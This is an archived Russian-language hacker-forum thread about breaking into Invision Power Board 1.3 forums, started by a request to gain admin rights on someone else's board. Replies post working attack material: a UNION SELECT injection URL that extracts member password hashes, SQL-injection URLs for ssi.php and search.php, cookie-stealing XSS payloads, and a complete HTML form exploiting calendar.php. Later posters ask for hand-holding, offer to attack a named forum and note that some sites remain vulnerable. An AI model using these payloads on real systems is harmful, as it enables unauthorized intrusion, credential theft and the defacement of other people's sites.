PDA

Просмотр полной версии : Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.


dukalis(AwP)
16.12.2004, 23:31
Всем привет! Срочно очень нужна помощь!!!
Есть форум Invision Power Board(U) v1.3 PF1
(именно такой! не путать с бест фалйз!)
Нужно удалить на таком форуме раздел, то бишь получить права администратора! Пожалуйста, очень прошу помощи!

fucker"ok
25.12.2004, 08:55
Если не стоят патчи, то можно воспользоваться кучей штук. Была какая-то бага которая позваляла выполнить Sql запрос тобишь хеши можно поиметь.

Майор
28.12.2004, 14:03
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0, 0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

(-=util=-)
30.12.2004, 04:54
А для v1.3.1 Final нету ничего умного???

uf0
30.01.2005, 14:56
*************************************
SQL инъекция в Invision Power Board
Программа: Invision Power Board 1.3.1
Опасность:

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может внедрить SQL команды.

'ssi.php' не проверяет данные, представленные пользователем. Пример:

http://[target]/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION]

URL производителя: http://www.invisionboard.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

**********************************

**********************************

Раскрытие инсталляционного пути в Invision Power Board
Программа: Invision Power Board 1.3 Final
Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость раскрытия информации обнаружена в Invision Power Board. Удаленный авторизованный пользователь может определить инсталляционный путь.

Пример/Эксплоит:

http://[target]/forum/index.php?act=UserCP&CODE=photo
************************************

Межсайтовый скриптинг в Invision Power Board
Программа: Invision Power Board 1.3 Final
Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.

Форум не проверяет правильность данных, представленных пользователем в поле ‘pop’.

Пример/Эксплоит:

http://<host>/forum//index.php?s=&act=chat&pop=1;'><script>alert('this could be
your cookie')</script><plaintext>

*******************************


Межсайтовый скриптинг в Invision Power Board
Программа: Invision Power Board 1.3 Final
Опасность: Низкая

Наличие эксплоита: Да

Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.

Параметры 'c', 'f', 'showtopic', 'showuser', и 'username' не фильтруют HTML код, представленный пользователем:

http://[target]/?c='><script>alert(window.document.url)</script><plain text>
http://[target]/?showtopic='><script>alert(window.document.url)</script><plaintext>
http://[target]/?act=SR&f='><script>alert(document.cookie)</script>
http://[t arget]/?showuser='><script>alert(document.cookie)</script>
http://[target]/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>

URL производителя:http://www.invisionboard.com/

SQL инъекция в Invision Power Board
Программа: Invision Power Board все версии
Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Invision Board Forum в "sources/search.php". Удаленный пользователь может выполнить произвольный SQL код на основной базе данных.

Уязвимый код:


if (isset($ibforums->input['st']) )
{
$this->first = $ibforums->input['st'];
}

Пример/Эксплоит:

http://www.board.com/forum/index.php?act=S...v=lv&CODE=show&
searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/*
*********************************

SQL инъекция в Invision Power Board
Программа: Invision Power Board 1.3 FINAL
Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.

Уязвимость обнаружена в сценарии sources/calendar.php в параметре 'request'.

Пример/Эксплоит:

<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems
</title></head>
<body>
<form action='/index.php?act=calendar' method='post'
onsubmit="this.m.value='2 )) UNION
'+this.request.value+'#';this.action=this.url.valu e+this.action;">
<b>IPB directory URL :</b> <input type='text' size='45' name='url'
value='http://forum.target.com'><br><br>
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request'
value='SELECT * FROM ibf_calendar_events'><br><br>
<u>Attention :</u> The request result MUST have this structure :<br><br>
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,IN T,INT,CHAR(2),INT,INT,
INT,INT,STR,STR<br><br>
<input type='hidden' name='y' value='2004'>
<input type='hidden' name='m'>
<input type='submit' value='Execute'>
</form>
<br><br><br>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-025.html"
target="_blank">
Security-Corporation.com</a></p>
</body>
</html>

URL производителя: http://www.invisionboard.com

SEVKA
22.03.2005, 13:14
Люди а вы не могли бы по подробнее так сказать на пальцах обячнить как этим пользоваться ?

CunningFox
22.03.2005, 15:07
оставляй форум протестим ;)

SEVKA
23.03.2005, 02:03
так разобраться хочу а то чужими руками то даж не интересно

rsha1988
23.03.2005, 16:24
Не, лучше не оставляй ссылку на форум, а то они быыыыыстро его снеут)))

CunningFox
23.03.2005, 16:30
это верно :D

advlam
25.03.2005, 18:44
SQL инъекция в Invision Power Board
Программа: Invision Power Board 1.3.1
Опасность:

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может внедрить SQL команды.

'ssi.php' не проверяет данные, представленные пользователем. Пример:

http://[target]/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION]

URL производителя: http://www.invisionboard.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
что можно сделать с этой sql? напишите пример запроса этого

advlam
25.03.2005, 19:50
это верно :D
cards.donpac.ru

White Jordan
25.03.2005, 19:56
Ой не давай не давай ато взломаем....=))))

Zingara
19.04.2006, 19:08
Ребят, вопрос глупый и нескромный... а эти уязвимрсти на данный момент еще присутствуют? А то руки чешутся на одном форуме опыты провести...

FHT
19.04.2006, 19:40
Ребят, вопрос глупый и нескромный... а эти уязвимрсти на данный момент еще присутствуют? А то руки чешутся на одном форуме опыты провести...
Ну оч мало таких осталось...
хотя пару ссыл досих пор работают...
но это нада быть полным аленем что бы оставить эти баги